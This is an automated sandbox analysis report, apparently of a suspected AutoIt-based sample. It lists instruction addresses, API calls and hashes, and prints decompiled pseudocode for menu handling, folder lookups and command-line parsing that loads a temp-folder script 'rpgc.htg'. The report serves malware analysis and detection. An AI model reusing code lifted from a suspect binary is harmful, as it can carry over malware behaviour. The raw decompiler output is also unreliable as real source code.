                            0x00b02273
                            0x00000000
                            0x00000000
                            0x00b02460
                            0x00b02464
                            0x00b02468
                            0x00b02473
                            0x00b02475
                            0x00b02477
                            0x00b0247c
                            0x00b0247f
                            0x00b02484
                            0x00b0248c
                            0x00b0248c
                            0x00b02494
                            0x00000000
                            0x00000000
                            0x00b02497
                            0x00b02497
                            0x00b0249d
                            0x00b0249e
                            0x00b024a0
                            0x00b024a2
                            0x00b024a4
                            0x00b024a6
                            0x00000000
                            0x00000000
                            0x00b024b1
                            0x00b024b1
                            0x00b024b7
                            0x00b024b8
                            0x00b024ba
                            0x00b024bc
                            0x00b024be
                            0x00b024c0
                            0x00000000
                            0x00000000
                            0x00b024cb
                            0x00b024cb
                            0x00b024d1
                            0x00b024d2
                            0x00b024d4
                            0x00b024d6
                            0x00b024d8
                            0x00b024da
                            0x00000000
                            0x00000000
                            0x00b024e5
                            0x00b024e5
                            0x00b024eb
                            0x00b024ec
                            0x00b024ee
                            0x00b024f0
                            0x00b024f2
                            0x00b024f4
                            0x00000000
                            0x00000000
                            0x00b024ff
                            0x00b024ff
                            0x00b02505
                            0x00b02506
                            0x00b02508
                            0x00b0250a
                            0x00b0250c
                            0x00b0250e
                            0x00000000
                            0x00000000
                            0x00b02519
                            0x00b02519
                            0x00b0251f
                            0x00b02520
                            0x00b02522
                            0x00b02524
                            0x00b02526
                            0x00b02528
                            0x00000000
                            0x00000000
                            0x00b02533
                            0x00b02533
                            0x00b02539
                            0x00b0253a
                            0x00b0253c
                            0x00b0253e
                            0x00b02540
                            0x00b02542
                            0x00000000
                            0x00000000
                            0x00b0254d
                            0x00b0254d
                            0x00b02553
                            0x00b02554
                            0x00b02556
                            0x00b02558
                            0x00b0255a
                            0x00b0255c
                            0x00000000
                            0x00000000
                            0x00b02567
                            0x00b02567
                            0x00b0256d
                            0x00b0256e
                            0x00b02570
                            0x00b02572
                            0x00b02574
                            0x00b02576
                            0x00000000
                            0x00000000
                            0x00b02581
                            0x00b02587
                            0x00b02588
                            0x00b0258a
                            0x00b0258c
                            0x00b0258e
                            0x00b02590
                            0x00000000
                            0x00000000
                            0x00b0259b
                            0x00b025a1
                            0x00b025a2
                            0x00b025a4
                            0x00b025a6
                            0x00b025a8
                            0x00b025aa
                            0x00000000
                            0x00000000
                            0x00b025b5
                            0x00b025bb
                            0x00b025bc
                            0x00b025be
                            0x00b025c0
                            0x00b025c2
                            0x00b025c4
                            0x00000000
                            0x00000000
                            0x00b025cf
                            0x00b025d5
                            0x00b025d6
                            0x00b025d8
                            0x00b025da
                            0x00b025dc
                            0x00b025de
                            0x00000000
                            0x00000000
                            0x00b025e9
                            0x00b025ef
                            0x00b025f0
                            0x00b025f2
                            0x00b025f4
                            0x00b025f6
                            0x00b025f8
                            0x00000000
                            0x00000000
                            0x00b02603
                            0x00b02609
                            0x00b0260a
                            0x00b0260c
                            0x00b0260e
                            0x00b02610
                            0x00b02612
                            0x00000000
                            0x00000000
                            0x00b0261d
                            0x00b02623
                            0x00b02624
                            0x00b02626
                            0x00b02628
                            0x00b0262a
                            0x00b0262c
                            0x00000000
                            0x00000000
                            0x00b02637
                            0x00b0263b
                            0x00b02642
                            0x00b02649
                            0x00000000
                            0x00000000
                            0x00b02659
                            0x00b02660
                            0x00b02666
                            0x00b02668
                            0x00000000
                            0x00b0266e
                            0x00000000
                            0x00b0266e
                            0x00000000
                            0x00000000
                            0x00b02673
                            0x00b02679
                            0x00b0267d
                            0x00b02682
                            0x00b02688
                            0x00b02689
                            0x00b026ac
                            0x00b0268b
                            0x00b0268b
                            0x00b0268d
                            0x00b02690
                            0x00b02693
                            0x00b0269c
                            0x00b0269e
                            0x00b026a2
                            0x00b026a2
                            0x00000000
                            0x00000000
                            0x00b02d5a
                            0x00b02d5a
                            0x00000000
                            0x00000000
                            0x00b026b7
                            0x00b026b9
                            0x00b026be
                            0x00000000
                            0x00000000
                            0x00b026c9
                            0x00b026cb
                            0x00b026d0
                            0x00000000
                            0x00000000
                            0x00b026db
                            0x00b026dd
                            0x00b026e2
                            0x00000000
                            0x00000000
                            0x00b026ed
                            0x00b026ef
                            0x00b026f4
                            0x00000000
                            0x00000000
                            0x00b026ff
                            0x00b02701
                            0x00b02706
                            0x00000000
                            0x00000000
                            0x00b02781
                            0x00b02783
                            0x00b02788
                            0x00000000
                            0x00000000
                            0x00b02793
                            0x00b02795
                            0x00b0279a
                            0x00000000
                            0x00000000
                            0x00b02711
                            0x00b02713
                            0x00b02718
                            0x00000000
                            0x00000000
                            0x00b02723
                            0x00b02725
                            0x00b0272a
                            0x00000000
                            0x00000000
                            0x00b02735
                            0x00b02737
                            0x00b0273c
                            0x00000000
                            0x00000000
                            0x00b02747
                            0x00b02749
                            0x00b0274e
                            0x00000000
                            0x00000000
                            0x00b02c29
                            0x00b02c29
                            0x00b02c2b
                            0x00b02c30
                            0x00000000
                            0x00000000
                            0x00b027a5
                            0x00b027a7
                            0x00b027ac
                            0x00000000
                            0x00000000
                            0x00b027b7
                            0x00b027b9
                            0x00b027be
                            0x00000000
                            0x00000000
                            0x00b02759
                            0x00000000
                            0x00000000
                            0x00b02778
                            0x00b02760
                            0x00b02760
                            0x00b02762
                            0x00b02d5c
                            0x00b02d5c
                            0x00b02d61
                            0x00b02768
                            0x00b02768
                            0x00b0276d
                            0x00b0276d
                            0x00000000
                            0x00000000
                            0x00b027c9
                            0x00000000
                            0x00000000
                            0x00b027d4
                            0x00000000
                            0x00000000
                            0x00b027df
                            0x00000000
                            0x00000000
                            0x00b027ea
                            0x00b027f1
                            0x00b027f6
                            0x00b027f8
                            0x00b027fa
                            0x00b027ff
                            0x00000000
                            0x00000000
                            0x00b02806
                            0x00b02812
                            0x00000000
                            0x00000000
                            0x00b02889
                            0x00000000
                            0x00000000
                            0x00b02893
                            0x00b02898
                            0x00b0289c
                            0x00b028a8
                            0x00b028ac
                            0x00b028b8
                            0x00b028bc
                            0x00b028c8
                            0x00b028cc
                            0x00b028d8
                            0x00b028dc
                            0x00b028e8
                            0x00b028ec
                            0x00b028f8
                            0x00b028fc
                            0x00b02917
                            0x00b0291b
                            0x00000000
                            0x00b0291d
                            0x00b0291d
                            0x00b0291d
                            0x00b028fe
                            0x00b028fe
                            0x00b02902
                            0x00b02907
                            0x00b0290d
                            0x00b0290d
                            0x00b02907
                            0x00b028ee
                            0x00b028ee
                            0x00b028ee
                            0x00b028de
                            0x00b028de
                            0x00b028de
                            0x00b028ce
                            0x00b028ce
                            0x00b028ce
                            0x00b028be
                            0x00b028be
                            0x00b028be
                            0x00b028ae
                            0x00b028ae
                            0x00b028ae
                            0x00b0289e
                            0x00b0289e
                            0x00b0289e
                            0x00000000
                            0x00000000
                            0x00b02931
                            0x00b02936
                            0x00b02939
                            0x00b0293b
                            0x00b02940
                            0x00000000
                            0x00000000
                            0x00b02947
                            0x00b0294d
                            0x00b02950
                            0x00b02952
                            0x00b02957
                            0x00b0295f
                            0x00b0295f
                            0x00b02967
                            0x00000000
                            0x00000000
                            0x00b02979
                            0x00b0297f
                            0x00b02984
                            0x00b02278
                            0x00b02278
                            0x00000000
                            0x00000000
                            0x00b0281d
                            0x00b02823
                            0x00b02827
                            0x00b02829
                            0x00b0284d
                            0x00b0282b
                            0x00b0282b
                            0x00b0282e
                            0x00b02843
                            0x00b02830
                            0x00b02830
                            0x00b02833
                            0x00b02927
                            0x00b02927
                            0x00b02839
                            0x00b02839
                            0x00b02839
                            0x00b02833
                            0x00b0282e
                            0x00000000
                            0x00000000
                            0x00b02857
                            0x00b02859
                            0x00b0285e
                            0x00b02860
                            0x00b02863
                            0x00b02865
                            0x00b02868
                            0x00b0286b
                            0x00b0286e
                            0x00b02875
                            0x00b0287a
                            0x00b0287c
                            0x00b0287c
                            0x00b02881
                            0x00000000
                            0x00000000
                            0x00b029cd
                            0x00b029d4
                            0x00b029da
                            0x00000000
                            0x00000000
                            0x00b029f1
                            0x00b029f6
                            0x00b029fd
                            0x00b029ff
                            0x00b02a01
                            0x00b02a09
                            0x00b02a0b
                            0x00b02a15
                            0x00b02a15
                            0x00b02a1d
                            0x00b02a20
                            0x00b02a22
                            0x00b02a25
                            0x00b02a36
                            0x00b02a27
                            0x00b02a27
                            0x00b02a2c
                            0x00b02a2c
                            0x00b02a3e
                            0x00b02a3e
                            0x00b02a3e
                            0x00b02a3f
                            0x00b02a46
                            0x00b02a47
                            0x00b02a4f
                            0x00b02a4f
                            0x00b02a15
                            0x00b02a53
                            0x00b02a55
                            0x00b02a5d
                            0x00000000
                            0x00000000
                            0x00b02a6d
                            0x00b02a76
                            0x00000000
                            0x00000000
                            0x00b02a87
                            0x00b02a8f
                            0x00000000
                            0x00000000
                            0x00b02a97
                            0x00b02a9d
                            0x00b02aa5
                            0x00000000
                            0x00000000
                            0x00b02aad
                            0x00b02ab3
                            0x00b02abb
                            0x00000000
                            0x00000000
                            0x00b02ac9
                            0x00b02ad1
                            0x00000000
                            0x00000000
                            0x00b021a0
                            0x00b021a8
                            0x00b021ad
                            0x00b021b5
                            0x00000000
                            0x00000000
                            0x00b021bd
                            0x00b021c2
                            0x00b021ca
                            0x00b021ca
                            0x00b021d2
                            0x00000000
                            0x00000000
                            0x00b021da
                            0x00b021df
                            0x00b021e7
                            0x00b021e7
                            0x00b021ef
                            0x00000000
                            0x00000000
                            0x00b02ad9
                            0x00b02ae4
                            0x00b02aea
                            0x00b02aed
                            0x00b02aef
                            0x00b02af4
                            0x00000000
                            0x00000000
                            0x00b02afb
                            0x00b02b06
                            0x00b02b0c
                            0x00b02b0f
                            0x00b02b11
                            0x00b02b16
                            0x00000000
                            0x00000000
                            0x00b02b23
                            0x00b02b26
                            0x00b02b2f
                            0x00b02b32
                            0x00b02b38
                            0x00b02b3a
                            0x00b02b3d
                            0x00b02b42
                            0x00b02b45
                            0x00b02b4a
                            0x00b02b51
                            0x00b02b53
                            0x00b02b59
                            0x00b02b61
                            0x00b02b61
                            0x00b02b69
                            0x00000000
                            0x00000000
                            0x00b02b72
                            0x00b02b75
                            0x00b02b7e
                            0x00b02b81
                            0x00b02b87
                            0x00b02b89
                            0x00b02b91
                            0x00b02b94
                            0x00b02b99
                            0x00b02ba0
                            0x00b02ba2
                            0x00b02ba8
                            0x00b02bb0
                            0x00b02bb0
                            0x00b02bb8
                            0x00000000
                            0x00000000
                            0x00b02c16
                            0x00b02c1b
                            0x00b02c1e
                            0x00000000
                            0x00b02c20
                            0x00b02c20
                            0x00b02c23
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b02c23
                            0x00000000
                            0x00000000
                            0x00b02bc0
                            0x00b02bcc
                            0x00000000
                            0x00000000
                            0x00b021f7
                            0x00b021fc
                            0x00b02204
                            0x00b02204
                            0x00b0220c
                            0x00000000
                            0x00000000
                            0x00b02bf9
                            0x00b02bfd
                            0x00b02c04
                            0x00b02c0b
                            0x00000000
                            0x00000000
                            0x00b02bd7
                            0x00b02be3
                            0x00b02be9
                            0x00b02bef
                            0x00000000
                            0x00000000
                            0x00b02c40
                            0x00b02c4c
                            0x00000000
                            0x00000000
                            0x00b02c68
                            0x00000000
                            0x00000000
                            0x00b02c78
                            0x00b02c84
                            0x00000000
                            0x00000000
                            0x00b02c94
                            0x00b02ca0
                            0x00000000
                            0x00000000
                            0x00b02cbc
                            0x00000000
                            0x00000000
                            0x00b02ccc
                            0x00b02cd8
                            0x00000000
                            0x00000000
                            0x00b02ce8
                            0x00b02cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b02cff
                            0x00b02d05
                            0x00b02d07
                            0x00b02d0c
                            0x00b02d67
                            0x00b02d67
                            0x00000000
                            0x00000000
                            0x00b02d10
                            0x00000000
                            0x00000000
                            0x00b02d1b
                            0x00b02d21
                            0x00b02d24
                            0x00b02d27
                            0x00b02d29
                            0x00b02d2b
                            0x00b02d2b
                            0x00b02d31
                            0x00b02d33
                            0x00b02d36
                            0x00b02d3b
                            0x00b02d3e
                            0x00b02d41
                            0x00b02d43
                            0x00b02d4f
                            0x00b02d4f
                            0x00b02d57
                            0x00000000
                            0x00000000
                            0x00b0299d
                            0x00b029a3
                            0x00b029a8
                            0x00b029ad
                            0x00b029bd
                            0x00b029c0
                            0x00b0227b
                            0x00b0227b
                            0x00b0227b
                            0x00b02281
                            0x00b02281
                            0x00b02286
                            0x00b02286
                            0x00b0228e
                            0x00b0228e
                            0x00b02296
                            0x00000000
                            0x00000000
                            0x00b02194
                            0x00b02118
                            0x00b0211d
                            0x00b02120
                            0x00b0212b
                            0x00b02132
                            0x00b02141
                            0x00b02146
                            0x00b0214b
                            0x00b0216b
                            0x00b02173
                            0x00b0217b
                            0x00b02180
                            0x00b02188
                            0x00b0214d
                            0x00b0214f
                            0x00b02157
                            0x00b02167
                            0x00b02167
                            0x00b0214b
                            0x00000000

                            APIs
                            • _memset.LIBCMT ref: 00B020BD
                            • _memset.LIBCMT ref: 00B020DB
                            • GetLocalTime.KERNEL32(?), ref: 00B0225C
                            • __swprintf.LIBCMT ref: 00B02273
                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,00B1BF48), ref: 00B024A6
                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,00B1BF48), ref: 00B024C0
                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,00B1BF48), ref: 00B024DA
                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00B1BF48), ref: 00B024F4
                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,00B1BF48), ref: 00B0250E
                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,00B1BF48), ref: 00B02528
                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,00B1BF48), ref: 00B02542
                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,00B1BF48), ref: 00B0255C
                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,00B1BF48), ref: 00B02576
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FolderPath$_memset$LocalTime__swprintf
                            • String ID: %.3d
                            • API String ID: 645292623-986655627
                            • Opcode ID: 2edf138a864288e7b197fb4f8794b15e2a3d82c8e83374971c5c672177752f46
                            • Instruction ID: 44fc2b17dab3371a655c9e6dd70b97ff5d785a43a20f0834b3bde71e89d27c80
                            • Opcode Fuzzy Hash: 2edf138a864288e7b197fb4f8794b15e2a3d82c8e83374971c5c672177752f46
                            • Instruction Fuzzy Hash: 58C1DC32764218ABDF10EBA4DD8AFED73B8FB44700F4045A9F509A71C1DB719E198B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFE7D4, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 207windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 86%
                            			E00AFE7D4(void* __fp0, struct tagMENUITEMINFOW** _a4, struct HWND__* _a8, intOrPtr _a12) {
				struct HMENU__* _v12;
				struct tagPOINT _v20;
				struct tagMENUITEMINFOW _v68;
				signed int _t51;
				signed int _t85;
				struct HWND__* _t87;
				struct HMENU__** _t88;
				void* _t99;

				_t99 = __fp0;
				_t88 = _a4;
				_v68.cbSize = 0x30;
				E00AA2E60( &(_v68.fMask), 0, 0x2c);
				_t51 = _a12 + 0xfffffe00;
				_t85 = 0;
				_v12 = _t88[0x274];
				if(_t51 > 6) {
					L20:
					if((_t88[3] & _t85) == 0 ||  *0xb274eb == 0) {
						L34:
						return _t51;
					} else {
						if(_t88[1] == 0) {
							DeleteMenu( *_t88, 5, 0);
							DeleteMenu( *_t88, 4, 0);
							DeleteMenu( *_t88, 6, 0);
							DeleteMenu( *_t88, 3, 0);
							_t88[2] = 0;
						} else {
							if(_t88[2] == 0) {
								if(GetMenuItemCount( *_t88) > 0) {
									_t88[0x274] = 4;
									E00AEFB23(_t88, 0, 0xb14e64, 0xffffffff, 0xffffffff, 0);
								}
								_t88[0x274] = 3;
								E00AEFB23(_t88, 0, _t88[0x1f], 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = 5;
								E00AEFB23(_t88, 0, 0xb14e64, 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = 2;
								E00AEFB23(_t88, 0, _t88[0x1b], 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = _v12;
								_t88[2] = 1;
							}
						}
						_t51 = GetMenuItemCount( *_t88);
						if(_t51 <= 0) {
							goto L34;
						} else {
							if(_t88[1] != 0) {
								if(_t88[1] != 0) {
									 *0xb274ec = 1;
									_v68.fMask = 1;
									_v68.fState = 8;
									SetMenuItemInfoW( *_t88, 4, 0,  &_v68);
								}
							} else {
								_t88[1] = 0;
							}
							GetCursorPos( &_v20);
							_t87 = _a8;
							SetForegroundWindow(_t87);
							TrackPopupMenuEx( *_t88, 0, _v20, _v20.y, _t87, 0);
							PostMessageW(_t87, 0, 0, 0);
							return E00A91E00(_t88, _t99);
						}
					}
				}
				switch( *((intOrPtr*)(_t51 * 4 +  &M00AFEA48))) {
					case 0:
						__edi = 0x40;
						_push(0xfffffff5);
						goto L19;
					case 1:
						_t85 = 1;
						_push(0xfffffff9);
						goto L19;
					case 2:
						__edi = 2;
						_push(0xfffffff8);
						goto L19;
					case 3:
						__eflags =  *((char*)(__esi + 0xa));
						__edi = 4;
						if(__eflags == 0) {
							L14:
							_push(0xfffffff3);
							goto L19;
						}
						__ebx = 7;
						_v68.fMask = 1;
						_v68.fState = 8;
						__eflags = __ecx - 7;
						if(__eflags < 0) {
							goto L14;
						} else {
							_a4 = __esi + 0x1d0;
							do {
								__eax = _a4;
								__eax =  *_a4;
								__eflags = __eax;
								if(__eax == 0) {
									goto L11;
								}
								__ecx =  &_v68;
								__eax = GetMenuItemInfoW( *__eax, __ebx, 0, __ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L11;
								}
								__eflags = _v68.fState & 0x00001000;
								if((_v68.fState & 0x00001000) == 0) {
									goto L11;
								}
								__eax = _a4;
								__ecx =  *_a4;
								__eflags = __ecx->cbSize -  *__esi;
								if(__eflags == 0) {
									__eax = E00AE3AE4(__ecx, __eflags, __esi, __ebx);
									goto L14;
								}
								L11:
								_a4 = _a4 + __edi;
								__ebx = __ebx + 1;
								__eflags = __ebx -  *((intOrPtr*)(__esi + 0x9d0));
							} while (__eflags <= 0);
							_push(0xfffffff3);
							goto L19;
						}
					case 4:
						__edi = 8;
						_push(0xfffffff7);
						goto L19;
					case 5:
						__edi = 0x10;
						_push(0xfffffff6);
						goto L19;
					case 6:
						__edi = 0x20;
						_push(0xfffffff2);
						L19:
						_push(_t88);
						_t51 = E00AE3A8B(_t74, _t91);
						goto L20;
				}
			}











                            0x00afe7d4
                            0x00afe7dc
                            0x00afe7e8
                            0x00afe7ef
                            0x00afe7fd
                            0x00afe805
                            0x00afe807
                            0x00afe80d
                            0x00afe8d8
                            0x00afe8db
                            0x00afea45
                            0x00afea45
                            0x00afe8ee
                            0x00afe8f8
                            0x00afe99f
                            0x00afe9a8
                            0x00afe9b1
                            0x00afe9ba
                            0x00afe9bc
                            0x00afe8fe
                            0x00afe902
                            0x00afe90f
                            0x00afe91f
                            0x00afe929
                            0x00afe929
                            0x00afe93b
                            0x00afe945
                            0x00afe958
                            0x00afe962
                            0x00afe974
                            0x00afe97e
                            0x00afe986
                            0x00afe98c
                            0x00afe98c
                            0x00afe902
                            0x00afe9c3
                            0x00afe9c7
                            0x00000000
                            0x00afe9c9
                            0x00afe9cd
                            0x00afe9d9
                            0x00afe9e6
                            0x00afe9ed
                            0x00afe9f4
                            0x00afe9fb
                            0x00afe9fb
                            0x00afe9cf
                            0x00afe9cf
                            0x00afe9cf
                            0x00afea05
                            0x00afea0b
                            0x00afea0f
                            0x00afea25
                            0x00afea32
                            0x00000000
                            0x00afea3a
                            0x00afe9c7
                            0x00afe8db
                            0x00afe813
                            0x00000000
                            0x00afe8cb
                            0x00afe8d0
                            0x00000000
                            0x00000000
                            0x00afe81a
                            0x00afe81f
                            0x00000000
                            0x00000000
                            0x00afe826
                            0x00afe82b
                            0x00000000
                            0x00000000
                            0x00afe832
                            0x00afe836
                            0x00afe83b
                            0x00afe8ac
                            0x00afe8ac
                            0x00000000
                            0x00afe8ac
                            0x00afe83d
                            0x00afe842
                            0x00afe849
                            0x00afe850
                            0x00afe852
                            0x00000000
                            0x00afe854
                            0x00afe85a
                            0x00afe864
                            0x00afe864
                            0x00afe867
                            0x00afe869
                            0x00afe86b
                            0x00000000
                            0x00000000
                            0x00afe86f
                            0x00afe877
                            0x00afe87d
                            0x00afe87f
                            0x00000000
                            0x00000000
                            0x00afe881
                            0x00afe888
                            0x00000000
                            0x00000000
                            0x00afe88a
                            0x00afe88d
                            0x00afe891
                            0x00afe893
                            0x00afe8a7
                            0x00000000
                            0x00afe8a7
                            0x00afe895
                            0x00afe895
                            0x00afe898
                            0x00afe899
                            0x00afe899
                            0x00afe8a1
                            0x00000000
                            0x00afe8a1
                            0x00000000
                            0x00afe8b0
                            0x00afe8b5
                            0x00000000
                            0x00000000
                            0x00afe8b9
                            0x00afe8be
                            0x00000000
                            0x00000000
                            0x00afe8c2
                            0x00afe8c7
                            0x00afe8d2
                            0x00afe8d2
                            0x00afe8d3
                            0x00000000
                            0x00000000

                            APIs
                            • _memset.LIBCMT ref: 00AFE7EF
                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00AFE877
                            • GetMenuItemCount.USER32 ref: 00AFE90B
                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00AFE99F
                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00AFE9A8
                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00AFE9B1
                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00AFE9BA
                            • GetMenuItemCount.USER32 ref: 00AFE9C3
                            • SetMenuItemInfoW.USER32 ref: 00AFE9FB
                            • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00AFEA05
                            • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00AFEA0F
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00AFEA25
                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00AFEA32
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                            • String ID: 0
                            • API String ID: 3993528054-4108050209
                            • Opcode ID: 2a8d2db057a831cde3a5f7b909f83efba2a0082b836470a8280e4f72006f78d8
                            • Instruction ID: dde85bfd06f5fd7efcff1afcbb934672895d19ab24b8cc6f481fa78142fe1138
                            • Opcode Fuzzy Hash: 2a8d2db057a831cde3a5f7b909f83efba2a0082b836470a8280e4f72006f78d8
                            • Instruction Fuzzy Hash: E371E770604308BFE730DB98CC85FAAB7E5AF85764F348719F6A5672E1C7B4A8408B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A92190, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00A92190(void* __ecx, void* __eflags, void* _a4) {
				char _v12;
				char _v28;
				char _v40;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v80;
				struct HINSTANCE__* _v84;
				void* __edi;
				void* __esi;
				void* _t78;
				void* _t81;
				void* _t84;
				void* _t91;
				intOrPtr* _t100;
				void* _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				void* _t110;
				intOrPtr _t118;
				void* _t139;
				intOrPtr* _t158;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;

				_t168 = __eflags;
				E00A9E8E0( &_v84);
				_push(_a4);
				_v12 = 0;
				E00A92790( &_v84, _t139, __eflags);
				 *0xb37f6c = 0;
				 *0xb37f50 = 0xb37f6c;
				E00A9F140(0,  &_v48,  &_v80);
				E00A91D10(L"CMDLINERAW",  &_v28, _t168);
				E00A91BE0(0, 1,  &_v48,  &_v28);
				E00A92480( &_v28);
				E00A99190(L"CMDLINERAW",  &_v48);
				_t146 = L"CMDLINE";
				_v40 = 1;
				_v48 = 0;
				E00A91D10(L"CMDLINE",  &_v28, _t168);
				E00A91BE0(0, 0x100,  &_v48,  &_v28);
				E00A92480( &_v28);
				E00A91D10(L"CMDLINE",  &_v28, _t168);
				E00A9C510(0,  &_v28,  &_a4,  &_v12);
				E00A92480( &_v28);
				_t118 = _v56;
				E00A9BEC0( &_v28, _t168);
				E00A91BA0( &_v84,  &_v28,  &_v28);
				_t156 = _v28;
				_t78 = E00AA13CB(L"CMDLINE", L"/ErrorStdOut", _v28);
				_t162 = _t161 + 8;
				if(_t78 == 0) {
					 *0xb274e8 = 1;
					_t118 = _t118 - 1;
					E00A91BA0( &_v84,  &_v28, _t156);
					_t156 = _v28;
				}
				_t81 = E00AA13CB(_t146, L"/AutoIt3OutputDebug", _t156);
				_t163 = _t162 + 8;
				if(_t81 == 0) {
					 *0xb274e7 = 1;
					_t118 = _t118 - 1;
					E00A91BA0( &_v84,  &_v28, _t156);
					_t156 = _v28;
				}
				_t84 = E00AA13CB(_t146, L"/AutoIt3ExecuteLine", _t156);
				_t164 = _t163 + 8;
				if(_t84 == 0) {
					 *0xb37f54 = 1;
					 *0xb37f58 = 1;
					GetModuleFileNameW(0, "C:\Users\engineer\AppData\Local\Temp\82139548\rpgc.htg", 0x104);
					E00A91BA0( &_v84,  &_v28, _t156);
					E00A9DE00(0xb37f5c,  &_v28);
					_t134 =  &_v28;
					_t118 = _t118 - 2;
					E00A91BA0( &_v84,  &_v28, 0xb37f5c);
					_t156 = _v28;
				}
				_t91 = E00AA13CB(_t146, L"/AutoIt3ExecuteScript", _t156);
				_t165 = _t164 + 8;
				if(_t91 == 0) {
					 *0xb37f54 = 3;
					E00A91BA0( &_v84,  &_v28, _t156);
					E00AA1487("C:\Users\engineer\AppData\Local\Temp\82139548\rpgc.htg", _v28);
					_t165 = _t165 + 8;
					_t134 =  &_v28;
					_t118 = _t118 - 2;
					E00A91BA0( &_v84,  &_v28, _t156);
					_t156 = _v28;
				}
				if( *0xb37f6c == 0) {
					E00AA1487("C:\Users\engineer\AppData\Local\Temp\82139548\rpgc.htg", _t156);
					_t165 = _t165 + 8;
					_t134 =  &_v28;
					_t118 = _t118 - 1;
					E00A91BA0( &_v84,  &_v28, _t156);
				}
				if(_t118 < 0) {
					_t118 = 0;
				}
				_t147 = _a4;
				_push(_t118 + 1);
				E00A9EA50(_a4, _t134, 1);
				_push(0);
				_t100 = E00A9D150(_t134, _a4, 0, 1);
				_t166 = _t165 + 0x14;
				_t158 = _t100;
				E00A99190(_a4, _t158);
				 *((intOrPtr*)(_t158 + 8)) = 1;
				 *_t158 = _t118;
				if(_t118 > 0) {
					_t108 = 0;
					while(1) {
						_t109 = _t108 + 1;
						_push(_t109);
						_v12 = _t109;
						_t110 = E00A9D150(_t134, _a4, 0, 1);
						_t166 = _t166 + 0xc;
						_t147 =  &_v28;
						E00A9E8A0(_t134, _t147, _t110);
						_t134 = _t147;
						E00A91BA0( &_v84, _t147, _t110);
						if(_v12 >= _t118) {
							goto L10;
						}
						_t108 = _v12;
					}
				}
				L10:
				E00A92480( &_v28);
				_t104 = E00A9D300(E00A99190(_t147,  &_v48),  &_v64);
				_v84 = 0;
				_v64 = 0xb14e68;
				E00A9D300(_t104,  &_v64);
				_push(_v60);
				E00AA10FC();
				return E00A92480( &_v80);
			}
































                            0x00a92190
                            0x00a9219c
                            0x00a921a6
                            0x00a921a9
                            0x00a921ac
                            0x00a921b9
                            0x00a921c0
                            0x00a921ca
                            0x00a921d7
                            0x00a921e4
                            0x00a921eb
                            0x00a921f3
                            0x00a921f8
                            0x00a92200
                            0x00a92207
                            0x00a9220a
                            0x00a92219
                            0x00a92220
                            0x00a92228
                            0x00a92237
                            0x00a9223e
                            0x00a92243
                            0x00a92249
                            0x00a92254
                            0x00a92259
                            0x00a92262
                            0x00a92267
                            0x00a9226c
                            0x00ab8a89
                            0x00ab8a90
                            0x00ab8a91
                            0x00ab8a96
